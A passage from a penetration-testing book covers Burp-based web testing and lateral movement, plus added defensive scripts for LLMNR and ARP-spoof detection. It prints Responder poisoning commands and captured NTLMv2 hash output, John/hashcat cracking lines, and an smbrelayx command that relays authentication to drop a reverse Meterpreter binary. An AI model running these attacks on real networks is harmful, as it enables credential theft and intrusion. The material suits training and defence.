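    bank.transfer_vulnerable(cookie, "Frank", 123.44)
    bank.transfer_vulnerable(cookie, "Frank", 123.44)   # the Repeater replay: accepted again
    vuln_log = list(bank.log)

    bank = Bank()
    cookie = bank.login("alice")
    token = bank.transfer_form(cookie)
    first = bank.transfer_hardened(cookie, "Frank", 123.44, token)
    replay = bank.transfer_hardened(cookie, "Frank", 123.44, token)     # same token again
    forged = bank.transfer_hardened(cookie, "Frank", 123.44, "guess")   # no token at all
    return vuln_log, list(bank.log), (first, replay, forged)


if __name__ == "__main__":
    print(demo())
```

The token is bound to the session and never appears in a cookie, so a link the victim clicks cannot carry it; SameSite cookie attributes and an Origin/Referer check are worthwhile additional layers but do not replace the token.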


Session Tokens 


Session tokens are generally used for tracking sessions, as HTTP is a stateless protocol by default. 
What you want to look for in a session token is (1) that it cannot be guessed and (2) that 
it properly tracks a user. Other things you should look for are when session tokens expire, whether they are 
marked secure, that the application validates them, and that they are properly utilized. 


In this section, we are going to specifically look at making sure session tokens are properly 
randomized and that they can't be guessed. Using Burp Suite to capture an authentication process, we 
can see in the response that there is a set-cookie value for the session tokens. This is located under 
the main Proxy tab and sub-tab History. 

[Screenshot: Burp's raw response to the authentication request, including the Set-Cookie header carrying the session token] 

Burp's Raw Response 


We can right-click within the raw response section and send this request to the Sequencer feature. 


[Screenshot: the right-click menu (Send to Spider, Do an active scan, Do a passive scan, Send to Intruder Meta+I, Send to Repeater Meta+R, Send to Sequencer, Send to Comparer, Send to Decoder, Show response in browser, Request in browser) with Send to Sequencer highlighted] 

Sending the Raw Request to Sequencer 


Once you click Send to Sequencer, jump over to the Sequencer tab and identify which session tokens 
are important to you. Once you pick your token, you can click the Start Live Capture to start 
generating session tokens. 
[Screenshot: the Sequencer tab, Live capture > Select Live Capture Request, with the POST /api/login request selected. Under Token Location Within Response the Cookie radio button is chosen, showing the session-23748326.2013-11-30T... cookie, and a Start live capture button is available] 

Selecting the Session Token 


Once you start the capture, a new window will pop up and it will start processing and generating tokens. 
After so many tokens, it will give you summaries of entropy (randomness), character-level analysis 
(see image below), and bit-level analysis. In the image below, Burp Suite is analyzing the placement 
of each character. There are many other features within Burp's Sequencer tool, so I recommend 
spending some time trying to understand how session tokens are generated. 

[Screenshot: Live capture (8693 tokens), Requests: 8693, Errors: 0, Character-level analysis > Count tab, "Character Count Analysis - Significance Levels" plotted by character position. The Anomalies panel reads:] 

278 anomalies were identified in this test: 
character 9 is too rare at position 24 (count: 1235, probability in a random sample: 0.0029%) 
character 0 is too common at position 29 (count: 624, probability in a random sample: 0.00010%) 
character 2 is too rare at position 29 (count: 276, probability in a random sample: less than 0.0001%) 
character 3 is too common at position 29 (count: 683, probability in a random sample: less than 0.0001%) 
character 5 is too rare at position 29 (count: 398, probability in a random sample: less than 0.0001%) 
character 7 is too common at position 29 (count: 730, probability in a random sample: less than 0.0001%) 
character 8 is too common at position 29 (count: 640, probability in a random sample: less than 0.0001%) 
character 9 is too common at position 29 (count: 643, probability in a random sample: less than 0.0001%) 

Character Position for Cookies 


I leave a lot here to your own judgment because it takes experience to understand when session 
cookies are or aren't secure. Every major web application I have seen uses different types of 
implementations and algorithms to generate session tokens, so running something like the examples 
above or reviewing source code may be required. 
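The character-level analysis shown above can be reproduced in miniature. The following is an added example (my code, not Burp's Sequencer implementation) that measures the Shannon entropy of the character at each token position over a sample, which is what "too common" and "too rare" at a position amount to. It compares two constructed generators: a sequential id joined to a date, modelled on the session-23748326.2013-11-30T cookie in the screenshot, and tokens from Python's secrets module. It goes a step beyond the single cookie in the text by summing per-position entropy into an effective-bits figure, which is only an upper bound, since correlations between positions are invisible to a per-position test.

```python
"""Per-position character analysis of session tokens, in the spirit of Burp Sequencer's
character-level analysis.

Added example, not Burp's algorithm and not the book's code. Sequencer reports characters
that are 'too common' or 'too rare' at each position; here we compute the Shannon entropy
of the character at each position over a sample of tokens and flag positions that carry
far less than the alphabet allows. Two constructed generators are compared: a predictable
'counter plus date' token (modelled on the session-23748326.2013-11-30T... cookie in the
screenshot) and one built from the secrets module.
"""
import math
import secrets
from collections import Counter


def predictable_tokens(n, start=23748326, day="2013-11-30"):
    """Constructed weak generator: a sequential id joined to a date. The date positions
    never change and the counter's high digits barely do."""
    return [f"session-{start + i}.{day}T" for i in range(n)]


def strong_tokens(n, nbytes=16):
    """128 bits from the OS CSPRNG, hex-encoded (32 hex characters)."""
    return [secrets.token_hex(nbytes) for _ in range(n)]


def position_entropy(tokens):
    """Shannon entropy (bits) of the character at each position, over the common prefix length."""
    if not tokens:
        return []
    width = min(len(t) for t in tokens)
    result = []
    for pos in range(width):
        counts = Counter(t[pos] for t in tokens)
        total = sum(counts.values())
        h = -sum((c / total) * math.log2(c / total) for c in counts.values())
        result.append(h)
    return result


def effective_bits(tokens):
    """Sum of per-position entropy: an upper bound on the token's randomness
    (positions may be correlated, which this per-position view cannot see)."""
    return sum(position_entropy(tokens))


def weak_positions(tokens, alphabet_bits, threshold=0.5):
    """Positions whose observed entropy is below threshold * the alphabet's maximum."""
    return [i for i, h in enumerate(position_entropy(tokens)) if h < threshold * alphabet_bits]


def report(n=2000):
    """Run both generators through the same analysis and return the headline numbers."""
    weak = predictable_tokens(n)
    strong = strong_tokens(n)
    return {
        "predictable_bits": effective_bits(weak),
        "predictable_weak_positions": weak_positions(weak, alphabet_bits=math.log2(10)),  # decimal digits
        "strong_bits": effective_bits(strong),
        "strong_weak_positions": weak_positions(strong, alphabet_bits=4.0),                # 16 hex symbols
    }


if __name__ == "__main__":
    for k, v in report().items():
        print(k, v)
```

With 2000 samples the predictable token scores roughly 12 effective bits, almost all of them in its last three digits, while the hex token scores close to its nominal 128. A real assessment also needs to look across positions (bit-level and transition tests) before calling a token safe.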


Additional Fuzzing/Input Validation 


Burp Suite is extremely extensible and has a lot of other features. One quick feature that I find 
extremely helpful during manual testing is the Intruder function. In the Intruder function, you have the 
ability to tamper with any part of the request and provide your own data. This would be very useful if 
you want to supply your own fuzzer input to test a variable. 


We are going to walk through a very high-level overview of how you could use the fuzzing feature. 
The basic idea of the following example is to access an online store and see why parameter fuzzing 
can be highly beneficial. The online store might only link to certain items from their website, but the 
content managers could have put up all of next week's sale items. They just wait for the next week and 
link the content from their main website homepage. 


I used to see a lot of these types of issues for sites that do Black Friday sales. They will have all of 
their content and prices hosted, but not linked anywhere on their page or made available to the public. 
Brute-forcing through all of the parameters will allow an attacker to know which items will go on 
sale that following week, before the public is notified. 


I created a dummy website to demonstrate this exact issue. The website 
www.securepla.net/tehc/hack.php?id=2 
has a GET parameter called ID. You can modify this ID field from 1 to 2 to 3 and get different results. 


[Screenshot: browser at www.securepla.net/tehc/hack.php?id=2 showing links for Document 1 and Document 2, the Document 2 text (an Urban Dictionary definition of a hacker) and the line "Your IP was logged:"] 

Brute Forcing Parameters 



We want to brute-force through all the different parameter values to see which pages exist and which 
pages do not. Since we already have our traffic flowing through Burp, we can go to the Proxy tab and 
then to your History tab. You will see all your past requests there. Right-click on that last request and 
click “Send to Intruder”. 

[Screenshot: Proxy > History listing requests to third-party ad hosts and to www.securepla.net for /tehc/hack.php and /tehc/hack.php?id=2. The last request is selected, its Raw headers (Host, User-Agent, Accept, Accept-Language, Accept-Encoding, Referer, Cookie, Connection) are shown, and the right-click menu (Remove from scope, Spider from here, Do an active scan, Do a passive scan, Send to Intruder, Send to Repeater, Send to Sequencer, Send to Comparer, Show response in browser, Request in browser) has Send to Intruder highlighted] 

Sending Request to Intruder 


Your Intruder tab at the top menu bar will light up. When you click that Intruder tab and move to the 
Positions tab, you will see a bunch of highlighted text. Since I am only testing one parameter at this 
time, I will click the "clear" button first, highlight just the "2" value (as it is the only one I want to 
fuzz), and click the "Add" button on the right side. This tells Burp to only fuzz whatever value is fed 
into the ID GET parameter and that parameter will now be yellow. 


There is another configuration selection called the Attack type. For this setting, I left it at the default 
type of Sniper. You should spend a quick second and review each of the different types of attacks on 
Burp Suite's site: 

http://portswigger.net/burp/help/intruder_positions.html 
[Screenshot: Intruder > Positions tab, Attack type: Sniper, with the payload marker placed around the id value in the base request: GET /tehc/hack.php?id=§2§ HTTP/1.1, followed by the Host, User-Agent, Accept, Accept-Language, Accept-Encoding, Referer, Cookie and Connection headers] 

Burp Payload Positions 


Go to the Payloads tab (still within the Intruder tab) and click the "Load" button. In this example, I am 
only loading a list of numbers from 1-100. However, you can add almost any type of list, depending 
on what you are working with. For example, if I am working with a database or LDAP queries, I will 
know the parameter that needs to be manipulated and will import a list of those fuzzed parameters. It 
is really up to you to figure out which types of tests you should fuzz. From our set-up phase, you 
should have a great fuzzing list located under /opt/SecLists/ on your Kali machine. 

[Screenshot: Intruder > Payloads tab. Payload Sets: Payload set 1, Payload type: Simple list, Payload count: 150, Request count: 150. Payload Options [Simple list] shows the loaded numbers 1, 2, 3, 4, ... with Paste, Load ..., Remove, Clear, Add and Add from list ... buttons] 

Burp List 


Once you have your list imported, you will need to kick off the Intruder attack. At the top menu bar, 
go to Intruder and Start attack. After you start the attack, a new Intruder Attack window will pop up 
and Burp will start trying all of the parameter requests. 


[Screenshot: the Intruder menu in Burp's top menu bar (Start attack, Open saved attack, Actively scan defined insertion points, Send to Repeater, Save attack config, Load attack config, Copy attack config, New tab behavior, Automatic payload positions, Configure predefined payload lists) with Start attack selected, over the Payloads tab from the previous figure] 

Starting Brute Forcing in Burp Suite 
[Screenshot: the Intruder attack window, Filter: Showing all items, with columns Request, Payload, Status, Error, Timeout, Length and Comment. Payloads 26, 28 and 29 returned status 200 with length 299; payload 27 (request 13) returned status 200 with length 315. The selected response reads:] 

HTTP/1.1 200 OK 
Date: Wed, 15 Apr 2015 03:12:29 GMT 
Server: Apache 
Vary: Accept-Encoding 
Content-Length: 155 
Connection: close 
Content-Type: text/html 

<a href=./hack.php?id=1>Document1</a>&nbsp<a href=./hack.php?id=2>Document2</a> ... 
System Password - dont hack me<p><p>Your IP was logged: 

Burp Suite Results 


As the requests start populating, how can you tell if a site has been changed based on parameter 
injection? Well, the easiest way to tell is by the length of the source code on that page, when that 
string is injected. If the source code length is different from a standard baseline, this informs us that 
there have been changes to the page. 

If we look at the sample test above, the parameter values we injected from 5 to 26, resulted in a page 
content length of 299. This source length of 299 is now our baseline for testing. When we go through 
all of the responses of all pages that are not 299 in length, we see that request 27 has a page length of 
315, which gives us the password: “dont hack me” (image above). 


You can also try manipulating other things in the original request. Try testing cookie values, 
GET/POST/HEAD parameters, user-agent strings, and other possible vulnerable fields. 
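Reading the Length column by eye does not scale past a few dozen payloads, so here is an added example (my code, not Burp's) that applies the chapter's baseline rule over a constructed set of responses: the most common body length is the baseline, and for each response that departs from it the words added relative to the baseline body are reported, so the reason for the change is visible without opening each response by hand. The bodies are constructed to mirror the hack.php page, with a labelled placeholder in place of the secret, and the same check serves a defender who wants to confirm that unpublished IDs all return a uniform "not found" page.

```python
"""Reading Intruder results: find the baseline response length and the payloads that break it.

Added example, not Burp's code. Burp shows a Length column; the chapter's method is to
treat the most common length as the baseline and look at anything else. This does that
over a constructed set of responses and, for each outlier, reports which words differ from
the baseline body.
"""
import difflib
from collections import Counter

# Constructed baseline body modelled on the hack.php page (not the real page source).
BASE_BODY = ('<a href=./hack.php?id=1>Document1</a>&nbsp;<a href=./hack.php?id=2>Document2</a>'
             '<p>No such document.</p><p>Your IP was logged:</p>')


def constructed_responses(ids=range(1, 31)):
    """Constructed sample: every id returns the same page except two that carry extra content.
    Values are (status, body), mirroring what Intruder records per request."""
    out = {}
    for i in ids:
        if i == 2:
            body = BASE_BODY.replace("No such document.", "Urban Dictionary describes a Hacker as ...")
        elif i == 27:
            body = BASE_BODY.replace("No such document.", "System Password: [placeholder secret]")
        else:
            body = BASE_BODY
        out[i] = (200, body)
    return out


def baseline_length(responses):
    """The most common body length across all payloads is the 'nothing here' page."""
    lengths = Counter(len(body) for _status, body in responses.values())
    return lengths.most_common(1)[0][0]


def _added_words(base_body, body):
    """Words in `body` that replace or extend the baseline, found with a word-level diff."""
    base_words, words = base_body.split(), body.split()
    sm = difflib.SequenceMatcher(None, base_words, words)
    return " ".join(" ".join(words[j1:j2]) for tag, _i1, _i2, j1, j2 in sm.get_opcodes()
                    if tag in ("insert", "replace"))


def find_outliers(responses):
    """Return {payload: added text} for responses whose body length differs from the baseline."""
    base_len = baseline_length(responses)
    base_body = next(b for _s, b in responses.values() if len(b) == base_len)
    outliers = {}
    for payload, (_status, body) in sorted(responses.items()):
        if len(body) == base_len:
            continue
        outliers[payload] = _added_words(base_body, body)
    return outliers


if __name__ == "__main__":
    resp = constructed_responses()
    print("baseline length:", baseline_length(resp))
    for payload, added in find_outliers(resp).items():
        print(f"payload {payload}: {added}")
```

Length alone can mislead when a page embeds the request parameter or a timestamp, which shifts every response by a character or two; diffing the bodies, as done here, separates that noise from content that is actually different.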


Other OWASP Top Ten Vulnerabilities 


Since OWASP is the standard in vulnerability categories, I strongly recommend that you familiarize 
yourself with the OWASP Top Ten Vulnerabilities by taking a moment to read through the Top Ten 
Cheat Sheet: 


• https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet 


OpenDNS’ little training program provides a good training environment to test and help you 
understand these vulnerabilities. You can read more about it here: 

• https://engineering.opendns.com/2015/03/16/security-ninjas-an-open-source-application-security-training-program/ 

To set up their lab, create a Kali Linux image configured on host-only mode, as it will contain web 
vulnerabilities. 


Setting Up: 

• service apache2 start 

• git clone https://github.com/opendns/Security_Ninjas_AppSec_Training.git /opt/SNAT 

• cd /opt/SNAT/ 

• cp /etc/php5/apache2/php.ini /etc/php5/apache2/php.ini.orig 

• cp php.ini /etc/php5/apache2/ 

• mkdir /var/www/test/ 

• cp -R src/Final/* /var/www/test/ 

• chmod 777 /var/www/test/*.txt 

Now, on your browser within your VM, open a browser to 127.0.0.1/test. This will walk you through 
the top ten issues, supply hints, and teach you how to exploit each of them. 

[Browser screenshot: 127.0.0.1/test/a1.html, the Security Ninjas page for A1: Injection, with a "Whois Lookup Service" form, Hint 1, Hint 2 and Solution links, and tabs A1 through A10] 

OWASP Top 10 

Since this is just a testing site and is vulnerable to attacks, you might want to remove it once you are 
done testing. 

When you are done: 

• rm -rf /var/www/test 

• cp /etc/php5/apache2/php.ini.orig /etc/php5/apache2/php.ini 

• service apache2 stop 







Functional/Business Logic Testing 


I want to stress one additional aspect when testing an application: This book gives a high-level 
overview of web application testing; however, functional testing is really where you make your 
money. Functional testing includes horizontal/vertical user rights testing, application flow testing, and 
ensuring things work as they should. For example, ensuring that: 

• Users aren't able to see other users' sensitive data 

• Regular users can't access administrative pages 

• Users can't change data values of other users 

• Workflows cannot be modified outside their intended flow 


One tool to help with basic functional testing is Burp Pro's Site Compare feature. 
After spidering and brute-forcing pages as both a regular user and a privileged user, we can go to 
Compare site maps. 


[Burp screenshot: Target > Site map tab with the context menu open on http://thehackerplaybook.com, showing the per-host actions (Spider this host, Actively scan this host, Passively scan this host, Engagement tools) and the Request/Response panes] 

Burp - Site Comparison 

This will compare the two different scans and show how responses differ based on the user account. 
Finding access as a regular user to privileged content, or identifying where responses are similar or 
different, could identify misconfigurations within the application. 

Burp - Site Comparison Results 


If you are interested in learning more, you can visit: 
https://www.owasp.org/index.php/Web_Application_Penetration_Testing . 

This is where successful testers spend a majority of their time. Anyone can run scans, but if you are 
an effective and efficient manual tester, you are leagues above the norm. 
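An added example (not the book's or Burp's code) of the site-map comparison as a script: two constructed site maps, one spidered as an administrator and one as a regular user, are classified per path so that privileged-only paths which return the same content to both accounts stand out. The paths, content lengths, the 5% "near" threshold and the `/admin` prefix are all assumptions.

```python
"""Compare site maps gathered as a privileged and a regular user (vertical rights testing)."""

# Constructed site maps: {path: (status, content length)} for each account.
ADMIN_MAP = {
    "/": (200, 4120),
    "/profile?id=7": (200, 2210),
    "/admin/users": (200, 9800),
    "/admin/export.csv": (200, 51220),
    "/logout": (302, 0),
}
USER_MAP = {
    "/": (200, 3890),              # fewer menu items for the regular user
    "/profile?id=7": (200, 2210),  # same profile page (horizontal checks need another user's id)
    "/admin/users": (403, 512),    # access control enforced
    "/admin/export.csv": (200, 51220),  # identical export handed to a regular user
    "/logout": (302, 0),
}


def compare_site_maps(privileged, regular, near=0.05):
    """Classify each path the privileged user could reach by what the regular
    user got back for the same request. Lengths within `near` (fraction of the
    privileged length) count as the same content."""
    findings = {}
    for path, (p_status, p_len) in privileged.items():
        if path not in regular:
            findings[path] = "not-requested"
            continue
        r_status, r_len = regular[path]
        if p_status != 200:
            findings[path] = "non-200-for-both" if r_status == p_status else "status-differs"
        elif r_status != 200:
            findings[path] = "enforced"            # denied or redirected: a control is in place
        elif p_len and abs(p_len - r_len) / p_len <= near:
            findings[path] = "same-content"        # both accounts see the same page
        else:
            findings[path] = "different-content"   # same URL, trimmed or different view
    return findings


def vertical_candidates(findings, privileged_prefixes=("/admin",)):
    """Paths that should be privileged-only but served the same content to the regular user."""
    return sorted(path for path, verdict in findings.items()
                  if verdict == "same-content" and path.startswith(privileged_prefixes))


if __name__ == "__main__":
    verdicts = compare_site_maps(ADMIN_MAP, USER_MAP)
    for path, verdict in sorted(verdicts.items()):
        print(f"{verdict:18} {path}")
    print("review for vertical privilege issues:", vertical_candidates(verdicts))
```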

Conclusion 

In a network penetration test, time is of the essence. You need to have a solid understanding of the 
underlying infrastructure, application, and possible vulnerabilities. This chapter has provided a 
high-level overview of vulnerabilities, how to identify them, and what type of impact they might have if 
that vulnerability is not resolved. 


Web vulnerabilities will probably be the most common vulnerability you will identify on an external 
penetration test. You should now be able to demonstrate how to take advantage of these issues 
efficiently. 



The Lateral Pass - Moving Through The Network 


At this point, you have compromised some servers and services through the SUCK network, but 
unfortunately, you only have low-privilege level accounts. A lateral pass play is used when you can’t 
seem to move forward. You might be on a network, but without privileges or account credentials, you 
would normally be stuck on a box. As a tester, you begin to distinguish yourself from the rest by your 
ability to move through the network and gain access to domain administrative accounts. However, as 
a penetration tester this shouldn’t be your only goal. It is also important to be able to identify where 
sensitive data is being stored and gain access to those environments. This might require pivoting 
through essential employees and understanding how the corporation segments their data. 


This section will focus on moving through the network and going from a limited user, all the way to 
owning the whole network. We will cover such topics as starting without credentials, proxying 
through hosts, having limited domain credentials, and then having local/domain credentials. 


On The Network Without Credentials: 


Let's say that you are on the network, but you don't have any credentials yet. Maybe you cracked their 
WPA2 Personal Wi-Fi password or popped a box that wasn't connected to the domain. I might first 
turn on tcpdump to listen passively, identify the network, find the domain controllers, and use other 
passive types of attacks. Once I feel like I have an understanding of the local network, I will start 
compromising systems using a variety of attacks described in the next few sections. 


Responder.py 

(https://github.com/SpiderLabs/Responder) (Kali Linux) 


One tool that has helped me in gaining my first set of credentials is called responder.py. Responder is 
a tool that listens and responds to LLMNR (Link Local Multicast Name Resolution) and NBT-NS 
(NetBIOS over TCP/IP Name Service). 


Responder also actively takes advantage of the WPAD vulnerability. You can read more about this 
attack in the following TechNet article: MS12-074 - Addressing a vulnerability in WPAD's PAC file 
handling (blogs.technet.com/b/srd/archive/2012/11/13/ms12-074-addressing-a-vulnerability-in-wpad-s-pac-file-handling.aspx). 
The basics are that when a browser (IE or the network LAN settings) is 
set to automatically detect settings, the victim host will try to fetch its proxy configuration file from the 
network. 



[Internet Explorer screenshot: Internet Options > Connections > Local Area Network (LAN) settings, with "Automatically detect settings" checked] 

Automatically Detect Settings 


As the attacker, since we are on the same network as our victim, we can respond to Name 
Resolutions and inject our own PAC file to proxy all web traffic. This way we can force the user to 
authenticate against our SMB servers. You might ask, "Why is this important?" If we can get the 
victim host to authenticate against our SMB servers, we can request their NTLM challenge/response 
hashes without alerting the victim that anything is misconfigured. If the user is already authenticated to 
the domain, they will try to use those cached credentials to authenticate against our servers. 
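A defensive counterpart to the name-resolution poisoning described above, added here and not part of the book or of Responder: an LLMNR honey-name probe. It multicasts a query for a random name that cannot exist on the network, so any host that answers is poisoning name resolution. The sample datagram, the name probe7f3a and the address 192.0.2.10 are constructed; the live probe needs a network and is only run from main.

```python
"""Honey-name LLMNR probe: nobody should answer for a name that does not exist."""
import secrets
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # RFC 4795 IPv4 multicast group
LLMNR_PORT = 5355


def encode_name(name):
    """DNS-style wire encoding: length-prefixed labels, zero terminated."""
    return b"".join(bytes([len(label)]) + label.encode("ascii")
                    for label in name.split(".")) + b"\x00"


def build_llmnr_query(name, txid):
    """Single-question LLMNR query for an A record (LLMNR reuses the DNS message format)."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def _skip_name(data, offset):
    """Advance past a (possibly compressed) name; IndexError on truncated data."""
    while True:
        length = data[offset]
        if length == 0:
            return offset + 1
        if length & 0xC0 == 0xC0:      # compression pointer occupies two bytes
            return offset + 2
        offset += 1 + length


def parse_llmnr_response(data, expected_txid):
    """Return the IPv4 addresses in the answer section; ValueError when the datagram
    is malformed or is not a response to our transaction."""
    try:
        txid, flags, qdcount, ancount, _ns, _ar = struct.unpack_from("!HHHHHH", data, 0)
        if txid != expected_txid:
            raise ValueError("transaction id mismatch")
        if not flags & 0x8000:
            raise ValueError("not a response")
        offset = 12
        for _ in range(qdcount):
            offset = _skip_name(data, offset) + 4          # skip QTYPE and QCLASS
        answers = []
        for _ in range(ancount):
            offset = _skip_name(data, offset)
            rtype, _rclass, _ttl, rdlength = struct.unpack_from("!HHIH", data, offset)
            offset += 10
            rdata = data[offset:offset + rdlength]
            offset += rdlength
            if rtype == 1 and rdlength == 4:
                answers.append(socket.inet_ntoa(rdata))
        return answers
    except (struct.error, IndexError) as exc:
        raise ValueError("malformed LLMNR message") from exc


def is_poisoned_answer(data, expected_txid):
    """True when a valid response claims at least one address for our bogus name."""
    try:
        return bool(parse_llmnr_response(data, expected_txid))
    except ValueError:
        return False


# Constructed datagram: what a poisoner would send back for the probe "probe7f3a"
# (transaction id 0x1234), claiming the name lives at 192.0.2.10.
SAMPLE_POISONED_RESPONSE = bytes.fromhex(
    "1234" "8000" "0001" "0001" "0000" "0000"              # id, QR=1, 1 question, 1 answer
    "0970726f62653766336100" "0001" "0001"                 # question: probe7f3a  A  IN
    "c00c" "0001" "0001" "0000001e" "0004" "c000020a")     # answer: ptr, A, IN, ttl 30, 192.0.2.10


def probe_network(timeout=2.0):
    """Live check: multicast one query for a random name and collect every answer."""
    name = "probe" + secrets.token_hex(3)
    txid = secrets.randbelow(0x10000)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    hits = []
    try:
        sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        while True:
            data, (src, _port) = sock.recvfrom(4096)
            if is_poisoned_answer(data, txid):
                hits.append((src, parse_llmnr_response(data, txid)))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return name, hits


if __name__ == "__main__":
    probed, hits = probe_network()
    for src, ips in hits:
        print(f"ALERT: {src} answered LLMNR for nonexistent name {probed!r} with {ips}")
    if not hits:
        print("no LLMNR responder answered the probe")
```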


If you want to see all of the commands for Responder, along with the documentation, visit: 
https://github.com/SpiderLabs/Responder . 

If you have followed the Setup Phase, we should already have Responder installed, so let's dive right 
in. 

In the example below, we start Responder with a few different flags. The "-i" flag is the IP of your 
host, the "-b" flag is Off so that NTLM (rather than Basic) authentication is requested, and -r is set to Off since leaving it on could break 
things on the network: 

• python ./Responder.py -i [Attacker IP] -b Off -r Off -w On 


NBT Name Service/LLMNR Answerer 1.0. 
Please send bugs/comments to: lgaffie@trustwave.com 
To kill this script hit CRTL-C 

[+]NBT-NS & LLMNR responder started 
[+]Loading Responder.conf File.. 
Global Parameters set: 
Challenge set is: 1122334455667788 
WPAD Proxy Server is:ON 
WPAD script loaded: function FindProxyForURL(url, host){return 'PROXY ISAProxySrv:3141; DIRECT';} 
HTTP Server is:ON 
HTTPS Server is:ON 
SMB Server is:ON 
SMB LM support is set to: OFF 
SQL Server is:ON 
FTP Server is:ON 
DNS Server is:ON 
LDAP Server is:ON 
Fingerprint Module is:OFF 
Serving Executable via HTTP&WPAD is:OFF 
Always Serving a Specific File via HTTP&WPAD is:OFF 


Responder.py 


Once Responder starts running, you should give it a few minutes to identify requests and send 
malicious responses. Below is this attack in progress. 


LLMNR poisoned answer sent to this IP: 192.168.0.2. The requested name was : wpad. 
[+]WPAD file sent to: 192.168.0.2 
LLMNR poisoned answer sent to this IP: 192.168.0.2. The requested name was : ISAProxySrv. 
[+]HTTP Proxy sent from: 192.168.0.2 The requested URL was: http://www.reddit.com/ 
[+]HTTP Cookie Header sent from: 192.168.0.2 The Cookie is: 
Cookie: [__utma/__utmb values omitted] 
[+]HTTP NTLMv2 hash captured from : 192.168.0.2 
Domain is : fakeDomain 
User is : cheetz 
Hostname is : CHEETZ-PC 
Complete hash is : cheetz::fakeDomain:[challenge]:[NTProofStr]:[blob omitted] 


Responder Results 


Several things happened once Responder.py started running. First, we see that LLMNR was 
poisoned for 192.168.0.2 and a malicious WPAD file was sent to the victim. This means that all of 
their web traffic will now use our attacker machine as a proxy, and that anything sent in clear 
text is visible to us. Secondly, we see that we are tracking the cookies for any website that the user 
visits. If they go to a site over HTTP after authenticating, we can now become the victim user, as we 
have all their cookies. Finally, and most importantly, we see the NTLM challenge/response hashes 
captured through our injected attacks. 

We do have a couple of problems with these hashes though. We can't use them right 
away in any sort of pass-the-hash attack, as these are NTLM challenge/response hashes rather than the 
NT hashes pass-the-hash needs. What we can do with them is run John the Ripper or oclHashcat against them. 


John Example: 

$ cat hashes.txt 
cheetz::FAKEDOMAIN:1122334455667788:4D8AABB385ADC35D8ABF778E9852BC27:010100( 
$ john --format=netntlmv2 hashes.txt 
Loaded 1 password hash (NTLMv2 C/R MD4 HMAC-MD5 [32/32]) 
password (cheetz) 

oclHashcat Example: 

cudaHashcat-plus64.exe -m5600 hashes.txt password_file.txt 


These two password-cracking examples are going to lead into the password-cracking section, but I 
wanted to give you a quick initial taste of how powerful Responder is. 


Sometimes it is not worth trying to crack a password. If you know the victim has a complex password 
policy or there aren't enough users online to get multiple hashes, you might want to try SMB relay 
attacks. Instead of enabling the SMB server in Responder, you can enable Metasploit's SMB relay 
module (use exploit/windows/smb/smb_relay) if the victim allows NTLMv1 authentication. This 
means that any SMB requests will be forwarded to a server of your choice and their challenge 
hashes will be authenticated against that server. Let's say you are able to do this against an IT admin; 
chances are they will have escalated privileges on the servers you identified. 


If you do have to go this route, I would recommend you watch this video by Rob Fuller: 
https://www.youtube.com/watch?v=05W5tUG7z2M. Fuller talks about using ZackAttack to help 
manage all the NTLM sessions and to continually compromise the network. 


However, if the end users or servers are configured in a way that only allows NTLMv2 connections, 
these tools will fail. The only way I have been successful in SMB relay attacks against NTLMv2 
authentication is by using the Impacket framework. You can download a copy here: 
http://code.google.com/p/impacket/ 

I originally found the configuration of Impacket from: http://pen-testing.sans.org/blog/pen-testing/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python, 
which goes over the entire setup. I won't dive too much into this since you can visit the SANS site for more details on 
creating a Meterpreter executable and running the python script. 




:~/Desktop/impacket-0.9.10/smbrelayx# python smbrelayx.py -h 192.168.0.16 -e ./reverse_meterpreter.exe 
Impacket v0.9.10 - Copyright 2002-2013 Core Security Technologies 

[*] Running in relay mode 
[*] Setting up SMB Server 
[*] Servers started, waiting for connections 
[*] Setting up HTTP Server 


smbrelayx.py 


Once you receive an SMB connection, it will relay that SMB authentication to another server and 
drop/execute the reverse Meterpreter binary. We will talk later about creating reverse shells in the 
Evading AV section. 


ARP (Address Resolution Protocol) Poisoning 


Generally, ARP poisoning is used either as a last resort or for a very specific test. There are times when I will 
do one, but be aware that there is a good chance that you will affect end users and possibly 
cause disruptions on the network. So make sure you have a great grasp on ARP spoofing before 
performing it on an engagement. 


For those that haven’t had too much experience with ARP Poisoning, let’s review what it does. ARP 
Poisoning is a common Man in the Middle (MITM) attack that takes advantage of the insecure nature 
of ARP, specifically the mapping between OSI layer 3 (IP address) and OSI layer 2 (MAC address). 
Basically, in a simple scenario, there is a network with a router (ROUTE A), a legitimate host 
(HOST A), and an attacker (HOST B). To poison these hosts, the attacker sends an unsolicited ARP 
reply to ROUTE A with the IP address of HOST A, but with their own HOST B MAC address. 
Then, the attacker sends an unsolicited ARP reply to HOST A with the IP address of ROUTE A, but 
again with their own HOST B MAC address. At this point, the router now thinks the attacker’s MAC 
address belongs to HOST A, and HOST A thinks the attacker’s MAC address belongs to 
ROUTE A. Ultimately, this routes all of HOST A’s traffic through HOST B, in both directions, before it reaches the 
router. This could lead to manipulation of traffic, sniffing for 
passwords/cookies/Kerberos keys, and more. If you want to see why ARP spoofing works, you can 
read more about it at http://www.irongeek.com/i.php?page=security/arpspoof. 
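The detection side of the ROUTE A / HOST A / HOST B scenario, as an added Python example (not from the book, Cain or ettercap): decode ARP replies from an Ethernet capture and alert when an IP address changes MAC or one MAC claims several IPs, which is the kind of anomaly ettercap's own arpcop plugin reports. The capture is constructed; the gateway and host MACs are made up, and the attacker MAC borrows the eth0 address shown in the ettercap output later in this chapter.

```python
"""Passive ARP-spoof detector in the spirit of arpwatch / ettercap's arpcop plugin."""
import struct

ETH_P_ARP = 0x0806


def parse_arp_frame(frame):
    """Decode an Ethernet II frame carrying an IPv4-over-Ethernet ARP packet; None otherwise."""
    if len(frame) < 42 or struct.unpack_from("!H", frame, 12)[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, oper = struct.unpack_from("!HHBBH", frame, 14)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sha, spa, tha, tpa = struct.unpack_from("!6s4s6s4s", frame, 22)
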